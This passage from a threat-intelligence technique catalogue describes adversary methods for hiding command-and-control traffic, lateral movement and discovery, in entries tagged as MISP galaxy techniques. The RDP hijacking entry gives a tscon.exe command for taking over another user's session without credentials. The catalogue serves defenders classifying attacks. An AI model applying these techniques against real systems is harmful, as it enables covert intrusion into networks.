Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.<sup>[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)]</sup>

[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.<sup>[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)]</sup>

Adversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure.

The tag is: misp-galaxy:technique="Protocol Tunneling"

Domain Fronting

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. <sup>[[Fifield Blocking Resistent Communication through domain fronting 2015](https://app.tidalcyber.com/references/52671075-c425-40c7-a49a-b75e44a0c58a)]</sup> Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x; however, the CDN may route it to domain-y.

The tag is: misp-galaxy:technique="Domain Fronting"

External Proxy

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: misp-galaxy:technique="External Proxy"

Internal Proxy

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: misp-galaxy:technique="Internal Proxy"

Multi-hop Proxy

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available Tor network. <sup>[[Onion Routing](https://app.tidalcyber.com/references/0667caad-39cd-469b-91c0-1210c09e6041)]</sup>

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

The tag is: misp-galaxy:technique="Multi-hop Proxy"

Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: misp-galaxy:technique="Proxy"

Query Registry

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.<sup>[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)]</sup> Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:technique="Query Registry"

Reflective Code Loading

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, instead of creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just stubs of fileless executable code (ex: position-independent shellcode).<sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup><sup>[[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)]</sup><sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]</sup>

Reflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the process’s own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.<sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)]</sup><sup>[[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]</sup>

The tag is: misp-galaxy:technique="Reflective Code Loading"

Remote Access Software

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as VNC, TeamViewer, AnyDesk, ScreenConnect, LogMeIn, AmmyyAdmin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.<sup>[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)]</sup><sup>[[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)]</sup><sup>[[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]</sup>

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. It may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access tools may also provide persistence (e.g., the software’s installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)).

The tag is: misp-galaxy:technique="Remote Access Software"

Cloud Services

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.

Many enterprises federate centrally managed user identities to cloud services, allowing users to log in with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5)), using commands such as <code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud CLI.

In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) instead of a username and password.

The tag is: misp-galaxy:technique="Cloud Services"

Direct Cloud VM Connections

Adversaries may leverage [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5), such as Azure Serial Console,<sup>[[Azure Serial Console](https://app.tidalcyber.com/references/fd75d136-e818-5233-b2c2-5d8ed033b9e6)]</sup> AWS EC2 Instance Connect,<sup>[[EC2 Instance Connect](https://app.tidalcyber.com/references/deefa5b7-5a28-524c-b500-bc5574aa9920)]</sup><sup>[[lucr-3: Getting SaaS-y in the cloud](https://app.tidalcyber.com/references/033e7c95-cded-5e51-9a9f-1c6038b0509f)]</sup> and AWS System Manager.<sup>[[AWS System Manager](https://app.tidalcyber.com/references/a7813928-4351-54c5-a64e-61bd4689e93b)]</sup>

Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access.

Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup> These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50)).

The tag is: misp-galaxy:technique="Direct Cloud VM Connections"

Distributed Component Object Model

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup>

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.<sup>[[Microsoft Process Wide Com Keys](https://app.tidalcyber.com/references/749d83a9-3c9f-42f4-b5ed-fa775b079716)]</sup> By default, only Administrators may remotely activate and launch COM objects through DCOM.<sup>[[Microsoft COM ACL](https://app.tidalcyber.com/references/88769217-57f1-46d4-977c-2cb2969db437)]</sup>

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications<sup>[[Enigma Outlook DCOM Lateral Movement Nov 2017](https://app.tidalcyber.com/references/48c8b8c4-1ce2-4fbc-a95d-dc8b39304200)]</sup> as well as other Windows objects that contain insecure methods.<sup>[[Enigma MMC20 COM Jan 2017](https://app.tidalcyber.com/references/ecc1023d-ef37-46e3-8dce-8fd5bb6a10dc)]</sup><sup>[[Enigma DCOM Lateral Movement Jan 2017](https://app.tidalcyber.com/references/62a14d3b-c61b-4c96-ad28-0519745121e3)]</sup> DCOM can also execute macros in existing documents<sup>[[Enigma Excel DCOM Sept 2017](https://app.tidalcyber.com/references/953dc856-d906-4d87-a421-4e708f30208c)]</sup> and may also invoke [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) (DDE) execution directly through a COM created instance of a Microsoft Office application<sup>[[Cyberreason DCOM DDE Lateral Movement Nov 2017](https://app.tidalcyber.com/references/6edb3d7d-6b74-4dc4-a866-b81b19810f97)]</sup>, bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). <sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>

The tag is: misp-galaxy:technique="Distributed Component Object Model"

Remote Desktop Protocol

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup>

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba) or [Terminal Services DLL](https://app.tidalcyber.com/technique/ae967542-1f37-4eea-993d-fff3867f2aea) for Persistence.<sup>[[Alperovitch Malware](https://app.tidalcyber.com/references/b6635fd7-40ec-4481-bb0a-c1d3391854a7)]</sup>

The tag is: misp-galaxy:technique="Remote Desktop Protocol"

SMB/Windows Admin Shares

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely access a networked system over SMB,<sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> to interact with systems using remote procedure calls (RPCs),<sup>[[TechNet RPC](https://app.tidalcyber.com/references/7eaa0fa8-953a-482e-8f6b-02607e928525)]</sup> transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) and certain configuration and patch levels.<sup>[[Microsoft Admin Shares](https://app.tidalcyber.com/references/68d23cb0-b812-4d77-a3aa-34e24a923a50)]</sup>

The tag is: misp-galaxy:technique="SMB/Windows Admin Shares"

SSH

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to log in as that user.

The tag is: misp-galaxy:technique="SSH"

VNC

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.<sup>[[The Remote Framebuffer Protocol](https://app.tidalcyber.com/references/4c75a00d-aa90-4260-ab7a-2addc17d1728)]</sup>

VNC differs from [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system’s authentication, but it can be configured to use credentials specific to VNC.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup><sup>[[VNC Authentication](https://app.tidalcyber.com/references/de6e1202-19aa-41af-8446-521abc20200d)]</sup>

Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.<sup>[[Hijacking VNC](https://app.tidalcyber.com/references/7a58938f-058b-4c84-aa95-9c37dcdda1fb)]</sup><sup>[[macOS root VNC login without authentication](https://app.tidalcyber.com/references/4dc6ea85-a41b-4218-a9ae-e1eea841f2f2)]</sup><sup>[[VNC Vulnerabilities](https://app.tidalcyber.com/references/3ec5440a-cb3b-4aa9-8e0e-0f92525ef51c)]</sup><sup>[[Offensive Security VNC Authentication Check](https://app.tidalcyber.com/references/90a5ab3c-c2a8-4b02-9bd7-628672907737)]</sup><sup>[[Attacking VNC Servers PentestLab](https://app.tidalcyber.com/references/f953ea41-f9ca-4f4e-a46f-ef1d2def1d07)]</sup><sup>[[Havana authentication bug](https://app.tidalcyber.com/references/255181c2-b1c5-4531-bc16-853f21bc6435)]</sup>

The tag is: misp-galaxy:technique="VNC"

Windows Remote Management

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).<sup>[[Microsoft WinRM](https://app.tidalcyber.com/references/ddbe110c-88f1-4774-bcb9-cd18b6218fc4)]</sup> It may be called with the winrm command or by any number of programs such as PowerShell.<sup>[[Jacobsen 2014](https://app.tidalcyber.com/references/f9ca049c-5cab-4d80-a84b-1695365871e3)]</sup> WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>

The tag is: misp-galaxy:technique="Windows Remote Management"

Remote Services

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to log in using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could log in to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).<sup>[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)]</sup><sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> They could also log in to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.<sup>[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup><sup>[[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)]</sup> Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.<sup>[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)]</sup><sup>[[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup>

The tag is: misp-galaxy:technique="Remote Services"

RDP Hijacking

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup>

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.<sup>[[RDP Hijacking Korznikov](https://app.tidalcyber.com/references/8877e1f3-11e6-4ae0-adbd-c9b98b07ee25)]</sup> This can be done remotely or locally and with active or disconnected sessions.<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup> It can also lead to [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.<sup>[[Kali Redsnarf](https://app.tidalcyber.com/references/459fcde2-7ac3-4640-a5bc-cd8750e54962)]</sup>

The tag is: misp-galaxy:technique="RDP Hijacking"

SSH Hijacking

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.<sup>[[Slideshare Abusing SSH](https://app.tidalcyber.com/references/4f63720a-50b6-4eef-826c-71ce8d6e4bb8)]</sup><sup>[[SSHjack Blackhat](https://app.tidalcyber.com/references/64f94126-de4c-4204-8409-d26804f32cff)]</sup><sup>[[Clockwork SSH Agent Hijacking](https://app.tidalcyber.com/references/4a4026e3-977a-4f25-aeee-794947f384b2)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>

[SSH Hijacking](https://app.tidalcyber.com/technique/45f2613d-35dd-4ddc-a222-30e9c0dd6bf6) differs from use of [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

The tag is: misp-galaxy:technique="SSH Hijacking"

Remote Service Session Hijacking

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>

The tag is: misp-galaxy:technique="Remote Service Session Hijacking"

Remote System Discovery

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or <code>net view</code> using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

The tag is: misp-galaxy:technique="Remote System Discovery"

Replication Through Removable Media

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.

